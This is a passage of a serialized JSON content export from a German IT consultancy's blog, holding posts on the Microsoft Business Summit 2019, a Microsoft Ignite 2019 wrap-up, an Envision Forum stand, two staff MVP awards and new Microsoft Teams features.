Provadis.","2019-10-08","/posts/2019-10-08-mint-camp-at-gk",{"title":4290,"description":4333},"posts/2019-10-08-mint-camp-at-gk",[4344,474],"Ausbildung","MnnUpEj7T5m_7LfkBCuPrgn8-Gl11eheyjXANoqdBVQ",{"id":4347,"title":4348,"author":155,"body":4349,"cta":3,"description":4402,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":4403,"moment":4408,"navigation":415,"path":4409,"seo":4410,"stem":4411,"tags":4412,"webcast":406,"__hash__":4413},"content_de/posts/2019-10-24-mbs19.md","Microsoft Business Summit 2019 Recap",{"type":350,"value":4350,"toc":4400},[4351,4358,4369,4386,4397],[353,4352,4353,4354,4357],{},"Gestern ging der ",[433,4355,4356],{},"Microsoft Business Summit 2019",", Microsofts wichtigste Plattform in Deutschland für digitale Trends und Marktentwicklungen, in Frankfurt zu Ende. Erstmalig waren auch Kunden eingeladen. Die Veranstaltung stand in diesem Jahr ganz unter dem Motto „Shared Intelligence“. Knapp 3.000 Teilnehmer informierten sich über Strategien und erfolgreiche Geschäftsmodelle rund um die Digitalisierung. Darunter auch sieben „GKler“, die 2,5 Tage lang mit Kunden, Partnern und Microsoft über kommende Entwicklungen rund um Microsoft 365 und Azure diskutierten. In diesem Kontext fand auch eine gemeinsame Podiumsdiskussion mit Glück & Kanja, PHAT CONSULTING und GAB IT Solutions statt, wie \"Partner-to-Partner\" richtig funktioniert. Unsere preisgekrönte Partnerschaft wurde mehrfach als Vorbild für digitale Transformation und echte Partnerschaft unter den Teilnehmern wahrgenommen, und das Interesse an dem „Wie“ und \"Warum\" war groß.",[353,4359,4360,4364,4366],{},[356,4361],{"alt":4362,"src":4363},"Podiumsdiskussion, wie Partner-to-Partner richtig funktioniert","https://res.cloudinary.com/c4a8/image/upload/blog/pics/mbs19-partner-to-partner.jpg",[2970,4365],{},[748,4367,4368],{},"Annette Wiedemann (Microsoft), Sabrina Gottwald (Microsoft), Harald Ehrl (GAB), Nils Langemann (PHAT) und Christian Kanja (Glück & Kanja) sprechen über eine erfolgreiche Partnerschaft",[353,4370,4371,4372,2454,4377,993,4381,4385],{},"Ein weiteres Highlight für uns war die Nachfrage von Microsoft und Partnern an unseren neuesten Lösungen ",[374,4373,4376],{"href":4374,"rel":4375},"https://www.glueckkanja.com/de/portfolio/cloud-security-operations-center/",[378],"Cloud Security Operation Center",[374,4378,3631],{"href":4379,"rel":4380},"https://www.glueckkanja.com/de/portfolio/scepman/",[378],[374,4382,3579],{"href":4383,"rel":4384},"https://www.glueckkanja.com/de/portfolio/radius-as-a-service/",[378],". Mit Michel Van der Bel, President, Microsoft EMEA, konnten wir in kleiner Runde über Europas Micosoft-Strategie sprechen sowie über viele neue Programmatiken, die unseren Kunden bei der digitalen Transformation helfen können.",[353,4387,4388,4392,4394],{},[356,4389],{"alt":4390,"src":4391},"Glück & Kanja im Austausch mit dem President of Microsoft EMEA","https://res.cloudinary.com/c4a8/image/upload/blog/pics/img-meeting-msft-president-emea.jpg",[2970,4393],{},[748,4395,4396],{},"Im Gespräch mit Michel Van der Bel, President, Microsoft EMEA",[353,4398,4399],{},"Insgesamt eine gelungene Konferenz, mit vielen tollen Ideen und interessanten Gesprächspartnern. Sie wird uns in guter Erinnerung bleiben. Auch im nächsten Jahr sind wir wieder dabei.",{"title":402,"searchDepth":403,"depth":403,"links":4401},[],"Gestern ging der Microsoft Business Summit 2019, Microsofts wichtigste Plattform in Deutschland für digitale Trends und Marktentwicklungen, in Frankfurt zu Ende. Erstmalig waren auch Kunden eingeladen. Die Veranstaltung stand in diesem Jahr ganz unter dem Motto „Shared Intelligence“. Knapp 3.000 Teilnehmer informierten sich über Strategien und erfolgreiche Geschäftsmodelle rund um die Digitalisierung. Darunter auch sieben „GKler“, die 2,5 Tage lang mit Kunden, Partnern und Microsoft über kommende Entwicklungen rund um Microsoft 365 und Azure diskutierten. In diesem Kontext fand auch eine gemeinsame Podiumsdiskussion mit Glück & Kanja, PHAT CONSULTING und GAB IT Solutions statt, wie \"Partner-to-Partner\" richtig funktioniert. Unsere preisgekrönte Partnerschaft wurde mehrfach als Vorbild für digitale Transformation und echte Partnerschaft unter den Teilnehmern wahrgenommen, und das Interesse an dem „Wie“ und \"Warum\" war groß.",{"categories":4404,"blogtitlepic":4405,"socialimg":4406,"customExcerpt":4407},[410],"head-mbs19","https://res.cloudinary.com/c4a8/image/upload/blog/heads/head-mbs19.jpg","Microsoft Deutschland lud erstmalig Kunden und Partner zum Microsoft Business Summit 2019 nach Frankfurt ein. Für uns als zweifach ausgezeichneten Partner des Jahres 2019 war das ein Heimspiel. Sieben „GKler“ diskutierten 2,5 Tage lang mit Kunden, Partnern und Microsoft über kommende Entwicklungen rund um Microsoft 365 und Azure. Eines der Highlights, passend zum Konferenzmotto „Shared Intelligence“, war die Podiumsdiskussion gemeinsam mit unseren 100% Cloud Partnern PHAT und GAB.","2019-10-24","/posts/2019-10-24-mbs19",{"title":4348,"description":4402},"posts/2019-10-24-mbs19",[422,1562],"MWY0gyEocA1mr3RMp1vCX1wSKvlykB-3lG8-sXa3iKM",{"id":4415,"title":4416,"author":191,"body":4417,"cta":3,"description":4660,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":4661,"moment":4666,"navigation":415,"path":4667,"seo":4668,"stem":4669,"tags":4670,"webcast":406,"__hash__":4672},"content_de/posts/2019-11-10-ignite-recap.md","Microsoft Ignite 2019 Wrap-up",{"type":350,"value":4418,"toc":4653},[4419,4440,4444,4457,4468,4472,4512,4516,4524,4528,4589,4593,4645],[353,4420,2138,4421,4425,4426,4430,4431,993,4435,4439],{},[374,4422,4424],{"href":2141,"rel":4423},[378],"Microsoft Ignite 2019"," zu Ende gegangen. Mit mehr als 26.000 Teilnehmern ist sie Microsofts größte Veranstaltung für IT-Entscheidungsträger und Führungskräfte und sollte für jedes Unternehmen zur Pflichtveranstaltung werden, das eine Microsoft Cloud-Strategie umsetzt. ",[374,4427,1839],{"href":4428,"rel":4429},"https://twitter.com/okieselb",[378]," und das Hairless-Team mit ",[374,4432,164],{"href":4433,"rel":4434},"https://twitter.com/janvonkirchheim",[378],[374,4436,97],{"href":4437,"rel":4438},"https://twitter.com/marcoscheel",[378]," waren live vor Ort und haben uns die wichtigsten Themen mitgebracht:",[629,4441,4443],{"id":4442},"microsoft-endpoint-manager","Microsoft Endpoint Manager",[353,4445,4446,4447,4451,4452,456],{},"Ab sofort werden alle Management Lösungen im cloud-basierten ",[374,4448,4443],{"href":4449,"rel":4450},"https://techcommunity.microsoft.com/t5/Enterprise-Mobility-Security/Modern-management-and-security-principles-driving-our-Microsoft/ba-p/946797",[378]," vereint, um somit die Verwaltung von Endgeräten erheblich zu vereinfachen. Neben Intune und ConfigMgr sind auch die Funktionalitäten des Device Management Admin Centers und Desktop Analytics enthalten. Um den Übergang zur neuen Endpoint-Management-Umgebung zu erleichtern, erhalten Kunden mit ConfigMgr-Lizenzen entsprechende Lizenzen für Intune. Hierzu gibt es auch einen ",[374,4453,4456],{"href":4454,"rel":4455},"https://anchor.fm/hairlessinthecloud/episodes/032---EN---Ignite-2019---Brad-Anderson-e8p3d0",[378],"Hairless in the Cloud-Podcast",[353,4458,4459,4463,4465],{},[356,4460],{"alt":4461,"src":4462},"Brad Anderson im Gespräch mit dem Hairless-Team","https://res.cloudinary.com/c4a8/image/upload/blog/pics/brad-meets-hairless.jpg",[2970,4464],{},[748,4466,4467],{},"Marco Scheel (Glück & Kanja), Brad Anderson (Microsoft) und Jan Geisbauer (Glück & Kanja) sprechen über Microsoft Endpoint Manager",[629,4469,4471],{"id":4470},"microsoft-intune","Microsoft Intune",[367,4473,4474,4481,4488,4497,4504],{},[370,4475,4476,4477,4480],{},"Die in Microsoft Azure verwaltete ",[433,4478,4479],{},"Microsoft Connected Cache"," Lösung ist eine Ergänzung zur Peer-to-Peer-Verteilung unter Berücksichtigung von Bandbreitenspitzen",[370,4482,4483,4484,4487],{},"Microsoft Intune kann Daten von ",[433,4485,4486],{},"Mobile Threat Defense (MTD)"," Partnern als Informationsquelle für die Einhaltung von Device-Compliance-Richtlinien und Conditional Access Regeln integrieren, um so den Zugriff von unauthorisierten mobilen Geräten auf Unternehmensressourcen wie Exchange und SharePoint zu verhindern. In der Vergangenheit mussten diese Geräte mit Intune MDM registriert werden. Jetzt hat Microsoft diese Functionalität auch für Mobile Application Management (MAM) zur Verfügung gestellt",[370,4489,4490,4491,4496],{},"Microsoft Intune kommt jetzt mit einem leistungsstarken ",[374,4492,4495],{"href":4493,"rel":4494},"https://techcommunity.microsoft.com/t5/Enterprise-Mobility-Security/Microsoft-Intune-announces-powerful-new-reporting-framework/ba-p/964256",[378],"Reporting-Framework",", um die von Intune erfassten Daten effizienter auswerten zu können",[370,4498,4499,4500,4503],{},"Neu sind auch die ",[433,4501,4502],{},"Intune Guided Scenarios",". Es handelt sich hierbei um einen geführten Assistenten, der durch einzelne Schritte für bestimmte Szenarien führt und in einem fertigen Policy Set endet.",[370,4505,4506,4511],{},[374,4507,4510],{"href":4508,"rel":4509},"https://docs.microsoft.com/en-us/windows-insider/at-home/whats-new-wip-at-home-1909",[378],"Die Key-Rolling- oder Key-Rotation-Funktion"," ermöglicht das sichere Verschieben von Wiederherstellungskennwörtern auf MDM-verwalteten AAD-Geräten entweder auf Anfrage von Microsoft Intune/MDM-Tools oder bei Nutzung eines Wiederherstellungskennwortes zum Entsperren des BitLocker-geschützten Laufwerks. Dieses Features hilft, eine versehentliche Weitergabe von Passwörtern als Teil der manuellen BitLocker-Freischaltung durch Benutzer zu verhindern.",[629,4513,4515],{"id":4514},"microsoft-productivity-score","Microsoft Productivity Score",[353,4517,4518,4519,4523],{},"Jedes Unternehmen braucht eine Möglichkeit, seine Produktivität zu messen. Der ",[374,4520,4515],{"href":4521,"rel":4522},"https://techcommunity.microsoft.com/t5/Microsoft-365-Blog/Microsoft-Productivity-Score-Insights-that-transform-how-work/ba-p/969722",[378]," verfolgt einen ganzheitlichen, unternehmensweiten Ansatz. Er umfasst sowohl Erkenntnisse aus der Mitarbeiter-Praxis als auch für die IT die technischen Erfahrungen und leitet daraus Best Practices ab, um Kulturwandel und Produktivität auf neue Weise voranzutreiben.",[629,4525,4527],{"id":4526},"microsoft-security-highlights","Microsoft Security Highlights",[367,4529,4530,4540,4546,4552,4559,4571,4581],{},[370,4531,4532,4535,4536,4539],{},[433,4533,4534],{},"MFA"," mit Microsoft Authenticator ab sofort ",[433,4537,4538],{},"kostenlos"," (#enableMFA)",[370,4541,4542,4545],{},[433,4543,4544],{},"Microsoft Secure Score"," als Orientierung und Empfehlung zur Verbesserung des Sicherheitsstatus, mit einem deutlich verbesserten Bewertungssystem, dass es einfacher macht und auch für Benutzer einsehbar",[370,4547,4548,4551],{},[433,4549,4550],{},"Microsoft Graph Security API"," integriert Drittanbieter, um eine bessere Bedrohungserkennung und schnellere Reaktion auf Vorfälle zu ermöglichen",[370,4553,4554,4555,4558],{},"Ab sofort ist ",[433,4556,4557],{},"Application Guard for Office"," in der Vorschau verfügbar. Es bietet Schutz vor potenziell schädlichen Word-, Excel- und PowerPoint-Dateien unter Verwendung von Microsoft Defender ATP",[370,4560,4561,4564,4565,4570],{},[433,4562,4563],{},"Microsoft Defender Advanced Threat Protection (ATP)"," jetzt auch für MacOS. Hierzu gibt es auch einen ",[374,4566,4569],{"href":4567,"rel":4568},"https://anchor.fm/hairlessinthecloud/episodes/036---EN---Ignite-2019---Heike-Ritter-e8rumu",[378],"Hairless in the Cloud Podcast"," mit Heike Ritter, Product Marketing Manager #MDATP.",[370,4572,4573,4574,993,4577,4580],{},"Weiterentwicklungen in ",[433,4575,4576],{},"Azure Sentinel",[433,4578,4579],{},"Insider Risk Management"," in Microsoft 365 helfen Kunden, Anforderungen an Sicherheit und Compliance zu erfüllen",[370,4582,4583,4588],{},[374,4584,4587],{"href":4585,"rel":4586},"https://www.microsoft.com/security/blog/2019/11/04/microsoft-announces-new-innovations-in-security-compliance-and-identity-at-ignite/",[378],"Übersicht"," über die Top 10 Ankündigungen in den Bereichen Sicherheit, Compliance und Identität",[629,4590,4592],{"id":4591},"microsoft-teams-bringt-neue-features-und-schnittstellen","Microsoft Teams bringt neue Features und Schnittstellen",[367,4594,4595,4601,4608,4615,4622,4628,4639,4642],{},[370,4596,4597,4600],{},[433,4598,4599],{},"Private Channels"," ermöglichen es Benutzern, Kanäle innerhalb bestehender Teams zu erstellen, die nur von ausgewählten Mitgliedern dieses Teams angesehen und aufgerufen werden können",[370,4602,4603,4604,4607],{},"Die ",[433,4605,4606],{},"Multiwindow-Funktion"," bietet Benutzern die Möglichkeit, Chats, Meetings, Anrufe oder Dokumente als separate Fenster anzuzeigen, um ihren Workflow zu optimieren",[370,4609,4610,4611,4614],{},"Neue ",[433,4612,4613],{},"Messaging-Erweiterungen"," einschließlich Umfragen werden im Team-Chat und Channel-Konversation verfügbar sein",[370,4616,4617,4618,4621],{},"Durch die ",[433,4619,4620],{},"Integration von Outlook in Teams"," können Benutzer eine E-Mail aus Outlook, einschließlich Anhängen, in einen Team-Chat oder eine Channel-Konversation verschieben",[370,4623,4617,4624,4627],{},[433,4625,4626],{},"Integration der Dienste To Do und Planner"," in Teams werden die Aufgaben eines Benutzers konsolidiert.",[370,4629,4630,4631,4634,4635,4638],{},"Meetings werden durch neue Funktionen integrativer und flexibler: ",[433,4632,4633],{},"Microsoft Whiteboard"," steht generell in Teams Meetings zur Verfügung, es werden live Untertitel für Telefon- und Videokonferenzen integriert, ab Herbst steht ausserdem ein ",[433,4636,4637],{},"erweitertes Rechtemanagement"," für Meeting-Organisatoren zur Verfügung",[370,4640,4641],{},"Ein neuer Ansatz ermöglicht es Microsoft Teams Rooms Devices sich über browserbasierte Technologien mit Meeting-Diensten anderer Anbieter zu verbinden",[370,4643,4644],{},"Neue Microsoft Teams Speakerphones verfügen über eine spezielle Team-Schaltfläche, die den Benutzern die Möglichkeit bietet, eine nahtlose Interaktion mit Teams zu ermöglichen. Die erste zertifizierte Freisprecheinrichtung ist heute bei Yealink CP900 erhältlich",[353,4646,4647,4651],{},[356,4648],{"alt":4649,"src":4650},"New integration between Outlook and Teams","https://res.cloudinary.com/c4a8/image/upload/blog/pics/outlook-to-teams.png",[748,4652,4620],{},{"title":402,"searchDepth":403,"depth":403,"links":4654},[4655,4656,4657,4658,4659],{"id":4442,"depth":704,"text":4443},{"id":4470,"depth":704,"text":4471},{"id":4514,"depth":704,"text":4515},{"id":4526,"depth":704,"text":4527},{"id":4591,"depth":704,"text":4592},"Am Freitag ist die Microsoft Ignite 2019 zu Ende gegangen. Mit mehr als 26.000 Teilnehmern ist sie Microsofts größte Veranstaltung für IT-Entscheidungsträger und Führungskräfte und sollte für jedes Unternehmen zur Pflichtveranstaltung werden, das eine Microsoft Cloud-Strategie umsetzt. MVP Oliver Kieselbach und das Hairless-Team mit Jan Geisbauer und Marco Scheel waren live vor Ort und haben uns die wichtigsten Themen mitgebracht:",{"categories":4662,"blogtitlepic":4663,"socialimg":4664,"customExcerpt":4665},[422],"head-ignite-2019","https://res.cloudinary.com/c4a8/image/upload/blog/heads/head-ignite-2019.jpg","GK war live vor Ort auf der Ignite 2019 und hat die wichtigsten Themen zusammengefasst wie bespielsweise die Ankündigung Microsoft Endpoint Manager, neue Features und Schnittstellen für Microsoft Teams u.v.m.","2019-11-11","/posts/2019-11-10-ignite-recap",{"title":4416,"description":4660},"posts/2019-11-10-ignite-recap",[1562,2126,4671],"Recap","BArHhrRQIhxBI__AtYC74Y5Naul7YU06_6It3FJLxCg",{"id":4674,"title":4675,"author":155,"body":4676,"cta":3,"description":4717,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":4718,"moment":4723,"navigation":415,"path":4724,"seo":4725,"stem":4726,"tags":4727,"webcast":406,"__hash__":4728},"content_de/posts/2019-11-20-envision.md","Glück & Kanja auf dem Microsoft Envision Forum",{"type":350,"value":4677,"toc":4715},[4678,4695,4709],[353,4679,4680,4681,4686,4687,4690,4691,4694],{},"Unter dem Motto „Innovate. Transform. Compete.“ fand gestern das ",[374,4682,4685],{"href":4683,"rel":4684},"https://www.microsoft.com/de-de/aktionen/envision-forum-manufacturing",[378],"Microsoft Envision Forum: Manufacturing - Industry Day"," in München statt. Eine sehr gut besuchte Veranstaltung mit ",[433,4688,4689],{},"über 300 Teilnehmern",", die passend zum Vertical in der alt-industriellen Event-Location ",[433,4692,4693],{},"Kohlebunker"," zusammenkamen. Microsoft Executives, Experten und Partner aus der Branche standen Kunden aus der Fertigungsindustrie mit ganzheitlichen Lösungsvorschlägen zum Thema Digitalisierung der Wertstoffkette zur Seite.",[353,4696,4697,4698,4701,4702,993,4705,4708],{},"Neben interessanten Keynotes stellten 15 Industrieunternehmen ihre ",[433,4699,4700],{},"IoT- und AI-Implementierungen"," auf Basis von Microsoft Azure vor. Zusätzlich fanden verschiedene Side-Events und eine Partnerausstellung statt. Wir von Glück & Kanja waren erstmalig mit einem Stand vertreten und stellten unsere aktuellen Azure Cloud Services ",[374,4703,3631],{"href":4704},"/de/portfolio/scepman/",[374,4706,4707],{"href":3868},"CSOC"," vor und trafen Kunden sowie interessierte Unternehmen, die begeistert waren von unserem umfangreichen Lösungsangebot, passend zur Bereitstellung des Future Workplaces und Einführung von Azure. Eine gelungene Veranstaltung mit hochwertigen Inhalten für die Fertigungsindustrie.",[353,4710,4711],{},[356,4712],{"alt":4713,"src":4714},"Jan Geisbauer auf dem Glück & Kanja Envision Stand","https://res.cloudinary.com/c4a8/image/upload/blog/pics/img-envision-jan-geisbauer.jpg",{"title":402,"searchDepth":403,"depth":403,"links":4716},[],"Unter dem Motto „Innovate. Transform. Compete.“ fand gestern das Microsoft Envision Forum: Manufacturing - Industry Day in München statt. Eine sehr gut besuchte Veranstaltung mit über 300 Teilnehmern, die passend zum Vertical in der alt-industriellen Event-Location Kohlebunker zusammenkamen. Microsoft Executives, Experten und Partner aus der Branche standen Kunden aus der Fertigungsindustrie mit ganzheitlichen Lösungsvorschlägen zum Thema Digitalisierung der Wertstoffkette zur Seite.",{"categories":4719,"blogtitlepic":4720,"socialimg":4721,"customExcerpt":4722},[422],"head-envision-v03","https://res.cloudinary.com/c4a8/image/upload/blog/heads/head-envision-v03.jpg","Glück & Kanja nahm erstmalig teil am diesjährigen Microsoft Envision Forum und stellte seine aktuellen Azure Cloud Services SCEPman und Cloud Security Operations Center vor.","2019-11-20","/posts/2019-11-20-envision",{"title":4675,"description":4717},"posts/2019-11-20-envision",[422,1562],"0oDb88fB4ld2ulDCBW0okWNMs98iCZYHN1qcw7f66ZA",{"id":4730,"title":4731,"author":191,"body":4732,"cta":3,"description":4770,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":4771,"moment":4775,"navigation":415,"path":4776,"seo":4777,"stem":4778,"tags":4779,"webcast":406,"__hash__":4780},"content_de/posts/2019-12-15-neue-gk-mvps.md","Zwei MVPs für Glück & Kanja",{"type":350,"value":4733,"toc":4768},[4734,4746,4765],[353,4735,4736,4737,4740,4741,4745],{},"Oliver Kieselbach ist bereits zum zweiten Mal in Folge MVP für Enterprise Mobility. Als Cloud Architect und Berater ist Oliver spezialisiert auf die Architektur, Betrieb und Deployment von Microsoft Cloud Infrastruktur Komponenten. Seine Beiträge für die Community findet Sie ",[374,4738,1611],{"href":1609,"rel":4739},[378],". Auf Twitter können Sie ihm unter ",[374,4742,4744],{"href":4428,"rel":4743},[378],"@okieselb"," folgen.",[353,4747,4748,4749,4754,4755,4760,4761,4745],{},"Jan Geisbauer wurde erstmalig zum Microsoft MVP für Cloud and Datacenter Management mit Schwerpunkt Enterprise Security ausgezeichnet. Seinen Blog “Modern Security in a Cloud World” finden Sie unter ",[374,4750,4753],{"href":4751,"rel":4752},"https://emptydc.com/author/jangeisbauer/",[378],"https://emptydc.com/",". Gemeinsam mit seinem Kollegen Marco Scheel produziert er außerdem den ",[374,4756,4759],{"href":4757,"rel":4758},"https://hairlessinthecloud.wordpress.com/",[378],"Hairless in the Cloud","-Podcast mit ihren Inhalten rund um die Microsoft Cloud. Auf Twitter können Sie ihm unter ",[374,4762,4764],{"href":4433,"rel":4763},[378],"@janvonkirchheim",[353,4766,4767],{},"Wir freuen uns, dass die beiden Teil des Glück & Kanja Teams sind!",{"title":402,"searchDepth":403,"depth":403,"links":4769},[],"Oliver Kieselbach ist bereits zum zweiten Mal in Folge MVP für Enterprise Mobility. Als Cloud Architect und Berater ist Oliver spezialisiert auf die Architektur, Betrieb und Deployment von Microsoft Cloud Infrastruktur Komponenten. Seine Beiträge für die Community findet Sie in seinem Blog. Auf Twitter können Sie ihm unter @okieselb folgen.",{"categories":4772,"blogtitlepic":4773,"socialimg":1619,"customExcerpt":4774},[410],"head-two-mvps","Oliver Kieselbach und Jan Geisbauer sind zu Microsoft Most Valuable Professionals (MVP) ernannt worden. Der Microsoft MVP Award zeichnet außergewöhnliche technische Expertise und Leistungen für die Community aus. Damit hat sich der außerordentliche Einsatz und die hohe fachliche Kompetenz der beiden Experten wieder einmal ausbezahlt.","2019-12-15","/posts/2019-12-15-neue-gk-mvps",{"title":4731,"description":4770},"posts/2019-12-15-neue-gk-mvps",[1625,474],"u2ghzimnMYPKqUxApg23itUu0Y_cAFxpwAwsde3uNic",{"id":4782,"title":4783,"author":48,"body":4784,"cta":3,"description":4788,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":4881,"moment":4886,"navigation":415,"path":4887,"seo":4888,"stem":4889,"tags":4890,"webcast":406,"__hash__":4891},"content_de/posts/2020-01-14-msft-teams.md","Was ist neu in Microsoft Teams?",{"type":350,"value":4785,"toc":4871},[4786,4789,4791,4796,4801,4806,4812,4816,4825,4829,4832,4836,4839,4843,4846,4851,4854,4857,4861,4864,4868],[353,4787,4788],{},"Microsoft Teams ist die am schnellsten wachsende Business-Applikation in der Geschichte von Microsoft. Mit täglich 20 Millionen aktiven Benutzern und 50.000 Unternehmen setzt Microsoft Teams Maßstäbe für eine bessere Kommunikation und Zusammenarbeit im Unternehmem. Selbst dem Platzhirsch Skype for Business konnte es den Rang ablaufen und muss sich als vollumfassende Telefonie-Lösung vor niemanden mehr verstecken.",[629,4790,4592],{"id":4591},[353,4792,4793,4795],{},[433,4794,4599],{}," ermöglichen es Benutzern, Kanäle innerhalb bestehender Teams zu erstellen, die nur von ausgewählten Mitgliedern dieses Teams angesehen und aufgerufen werden können. Nur die Eigentümer und Mitglieder des privaten Kanals können auf diesen zugreifen. Jeder, einschließlich Gäste, können einem privaten Kanal hinzugefügt werden, solange sie Mitglied des Teams sind. Ein private Channel ist beispielsweise sinnvoll, um die Kommunikation zwischen Personen, die einem bestimmten Projekt zugeordnet sind, zu erleichtern, ohne dass ein zusätzliches Team zur Verwaltung erstellt werden muss.",[353,4797,4603,4798,4800],{},[433,4799,4606],{}," bietet Benutzern die Möglichkeit, Chats, Meetings, Anrufe oder Dokumente als separate Fenster anzuzeigen. Damit hat der Benutzer seine wichtigen Unterhaltungen stets im Blick.",[353,4802,4803],{},[356,4804],{"alt":4606,"src":4805},"https://res.cloudinary.com/c4a8/image/upload/blog/pics/PopOutChatandMeeting.jpg",[353,4807,2239,4808,4811],{},[433,4809,4810],{},"Pinned Channels"," können Benutzer wichtige Kanäle an den Anfang ihrer Kanalliste schieben, um einen einfachen, schnellen Zugriff zu ermöglichen. Die angehefteten Kanäle können auch neu geordnet werden, um sie zu priorisieren. Dadurch wird nur die Ansicht des Benutzers geändert, die Ansichten für das restliche Team ändern sich nicht. Auch Videostreams während einer Besprechung können jetzt gepinned werden, so dass sie immer im Fokus bleiben.",[629,4813,4815],{"id":4814},"neue-messaging-erweiterungen-im-team-chat-und-channel-konversationen","Neue Messaging-Erweiterungen im Team-Chat und Channel-Konversationen",[353,4817,4818,993,4821,4824],{},[433,4819,4820],{},"Umfragen (Survey)",[433,4822,4823],{},"Abstimmungen (Poll)"," können nativ in den Teams-Chat eingebaut werden. Über die drei Punkte \"...\" am unteren Rand der Nachrichten-Box in einem Chat oder Kanal kann einfach und unkompliziert Feedback von anderen Teammitgliedern eingeholt werden.",[629,4826,4828],{"id":4827},"meetings-werden-durch-neue-funktionen-integrativer-und-flexibler","Meetings werden durch neue Funktionen integrativer und flexibler",[353,4830,4831],{},"Microsoft Whiteboard gehört inzwischen auch zu einer der Basis-Funktionen in einem Teams Meeting. Das Whiteboard bietet die perfekte Grundlage für den Austausch gemeinsamer Ideen und unterstützt damit eine kreative Zusammenarbeit, egal ob sich die Benutzer im gleichen Raum oder remote im Meeting befinden. Das erweiterte Rechtemanagement für Meeting-Organisatoren ermöglicht die Unterscheidung zwischen Präsentatoren und Teilnehmern. Der Präsentator hat die volle Kontrolle über das Meeting und ist somit in der Lage, Inhalte zu teilen, die Kontrolle zu übernehmen, andere Teilnehmer stumm zu schalten oder zu entfernen, Personen aus der Lobby zu holen und Aufnahmen zu starten/stoppen.",[629,4833,4835],{"id":4834},"microsoft-teams-jetzt-auch-unter-linux-verfügbar","Microsoft Teams jetzt auch unter Linux verfügbar",[353,4837,4838],{},"Microsoft Teams ist jetzt auch für Linux-Benutzer verfügbar und ermöglicht der Open-Source-Community eine qualitativ hochwertige Zusammenarbeit. Benutzer können die nativen Linux-Pakete in den Formaten .deb und .rpm herunterladen.",[629,4840,4842],{"id":4841},"integration-zwischen-outlook-und-teams","Integration zwischen Outlook und Teams",[353,4844,4845],{},"Der Benutzer kann aus Outlook eine E-Mail einschließlich Anhang in einen Teams-Chat oder in eine Channel-Unterhaltung überführen. Dafür gibt es in Outlook einen Button „Share to Teams“. Umgekehrt kann auch ein Konversationsverlauf aus einem Team an Outlook übergeben und somit als E-Mail versendet werden. Außerdem erhalten die Benutzer aussagekräftige E-Mails über verpasste Aktivitäten. Die verpassten Aktivitäts-E-Mails zeigen die neuesten Antworten aus einer Unterhaltung an und ermöglichen es, direkt aus der E-Mail heraus zu antworten.",[353,4847,4848],{},[356,4849],{"alt":4842,"src":4850},"https://res.cloudinary.com/c4a8/image/upload/blog/pics/Outlook-to-Teams-share.jpg",[629,4852,4626],{"id":4853},"integration-der-dienste-to-do-und-planner",[353,4855,4856],{},"Tasks in Teams ermöglicht eine einheitliche Sicht auf die persönlichen und zugewiesenen Aufgaben eines Benutzers. Es konsolidiert die Aufgaben aus To Do, Teams Channels, Planner und Outlook. Benutzer haben intelligente Sichten auf die ihnen zugewiesenen Aufgaben, einschließlich der Priorität sowie dem Start- und Fälligkeitsdatum. Die Benutzer können außerdem die Ansicht wählen, die für sie am besten geeignet ist, um Dinge zu erledigen (Liste, Tafeln, Diagramme, Zeitpläne).",[629,4858,4860],{"id":4859},"native-federation-for-11-chats","Native Federation for 1:1 Chats",[353,4862,4863],{},"Für Benutzer im TeamsOnly-Modus macht es keinen Unterschied mehr, ob sie mit einem Kollegen oder einer Person außerhalb ihrer Organisation kommunizieren. Das Feature Set liefert auch in der Kommunikation mit Externen die gleiche Chat-Erfahrung. Diese Benutzer lassen sich durch das „External“-Symbol neben dem Benutzernamen weiterhin einfach identifizieren.",[629,4865,4867],{"id":4866},"umfangreiche-telefonie-features","Umfangreiche Telefonie Features",[353,4869,4870],{},"Zu wissen, wer anruft und sicherzustellen, dass diese Anrufe die richtige Person erreichen, sind Schlüsselfunktionen für eine moderne Kommunikationslösung. Reverse Number Lookup, um den Namen eines Anrufers anzuzeigen, eine Anrufsverlaufliste (Call History) und auch eine Sprachmailbox (Voicemail), sollen dem Benutzer immer wissen lassen, wer angerufen hat. Die Stellvertreter Funktionen (Delegate) können die Anrufeinstellungen für diejenigen festlegen, deren Anrufe sie verwalten. Sie können zusätzliche Stellvertreter hinzufügen oder die Einstellungen für die Anrufweiterleitung ändern. Diese beiden Verbesserungen stellen sicher, dass die richtigen Anrufe zur richtigen Zeit die richtige Person erreichen.",{"title":402,"searchDepth":403,"depth":403,"links":4872},[4873,4874,4875,4876,4877,4878,4879,4880],{"id":4591,"depth":704,"text":4592},{"id":4814,"depth":704,"text":4815},{"id":4827,"depth":704,"text":4828},{"id":4834,"depth":704,"text":4835},{"id":4841,"depth":704,"text":4842},{"id":4853,"depth":704,"text":4626},{"id":4859,"depth":704,"text":4860},{"id":4866,"depth":704,"text":4867},{"categories":4882,"blogtitlepic":4883,"socialimg":4884,"customExcerpt":4885},[534],"head-whats-new-teams","https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/heads/head-whats-new-teams.jpg","Microsoft Teams ist die am schnellsten wachsende Business-Applikation in der Geschichte von Microsoft. Microsoft hat eine ganze Reihe von neuen Funktionen vorgestellt, mit denen die Teamarbeit noch effektiver, sicherer und inklusiver wird.","2020-01-14","/posts/2020-01-14-msft-teams",{"title":4783,"description":4788},"posts/2020-01-14-msft-teams",[534,964,422,1408,964],"_rY7fBvKY18_krZUYQdGocCVhbwutVLrGhcfNp4P4uk",{"id":4893,"title":4894,"author":191,"body":4895,"cta":3,"description":4961,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":4962,"moment":4967,"navigation":415,"path":4968,"seo":4969,"stem":4970,"tags":4971,"webcast":406,"__hash__":4972},"content_de/posts/2020-02-14-wgg.md","Wissen teilen und gemeinsam die Spitzenposition ausbauen",{"type":350,"value":4896,"toc":4959},[4897,4911,4924,4928,4940,4943,4946,4953],[353,4898,4899,4900,993,4903,4906,4907,4910],{},"Zwei Tage, über 40 Teilnehmer und 100 Prozent Cloud Content von und mit GAB, ",[374,4901,2453],{"href":2451,"rel":4902},[378],[374,4904,1214],{"href":3271,"rel":4905},[378]," - auf dem ersten ",[433,4908,4909],{},"'Wie geht's geiler?'-Workshop"," in Offenbach am Main kamen alle Teilnehmer voll auf ihre 